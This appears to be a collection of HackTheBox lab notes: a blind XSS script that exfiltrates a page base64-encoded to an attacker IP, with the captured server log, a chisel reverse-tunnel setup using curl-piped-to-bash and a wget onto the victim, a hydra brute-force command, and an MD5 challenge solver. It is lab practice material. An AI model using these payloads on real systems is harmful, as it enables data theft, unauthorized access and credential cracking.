Blind XSS Data Exfiltration

cat 2.js

var xhr=new XMLHttpRequest();
xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false);
xhr.send();
var xhr2=new XMLHttpRequest();
xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false);
xhr2.send();








└─# python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /2.js HTTP/1.1" 200 -

10.10.10.208 - - [13/Mar/2021 11:54:48] code 404, message File not found

10.10.10.208 - - [13/Mar/2021 11:54:48] "GET /aaaa?=PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8dGl0bGU+U2VjdXJpdHkgUmVwb3J0PC90aXRsZT4KICA8c3R5bGU+CiAgICB0YWJsZSwgdGgsIHRkIHsKICAgICAgYm9yZGVyOiAxcHggc29saWQgYmxhY2s7CiAgICB9CiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4KPGg0PkxvZ2dlZCBYU1MgYXR0ZW1wdHM8L2g0Pgo8dGFibGU+CiAgPHRoZWFkPgogICAgPHRyPgogICAgICA8dGQ+VGltZXN0YW1wPC90ZD4KICAgICAgPHRkPlVzZXIgQWdlbnQ8L3RkPgogICAgICA8dGQ+SVAgQWRkcmVzczwvdGQ+CiAgICA8L3RyPgogIDwvdGhlYWQ+Cjx0Ym9keT4KPC90Ym9keT4KPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 

www-data@passage:/tmp$ wget http://10.10.14.143/chisel

wget http://10.10.14.143/chisel

--2021-01-25 08:55:34--  http://10.10.14.143/chisel

Connecting to 10.10.14.143:80... failed: Connection refused.

www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel

wget http://10.10.14.143:8000/chisel

--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel

Connecting to 10.10.14.143:8000... connected.

HTTP request sent, awaiting response... 200 OK

Length: 8704000 (8.3M) [application/octet-stream]

Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 

##  my computer:

chisel server -p 9999 --reverse

## victim computer 

./chisel client 10.10.14.143:9999 R:631:localhost:631

##############

hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.

Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I
spent some time on this because I didn't issue the LIST command. See how it is done correctly :)

HackTheBox - Emdee five for life - WriteUp


import requests
import hashlib


s = requests.Session()
r = s.get("http://docker.hackthebox.eu:37358")
print(r.status_code)
print(r.text)
print('eeeeeeeeeeeeeee')


postString0 = r.text.split("\n",5)[5]
postString1 = postString0.split("<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>",1)[1]
kodzik = postString1.split("</h3>",1)[0]


print("kodzik from website:")
print(kodzik)


kodzikMd5 = hashlib.md5(kodzik.encode('utf-8')).hexdigest()

print("kodzik md5:")
print(kodzikMd5)


#p5={'hash': kodzikMd5}
p5='hash=kodzikMd5'

r5 = s.post("http://docker.hackthebox.eu:37358", p5)
print(r5.text)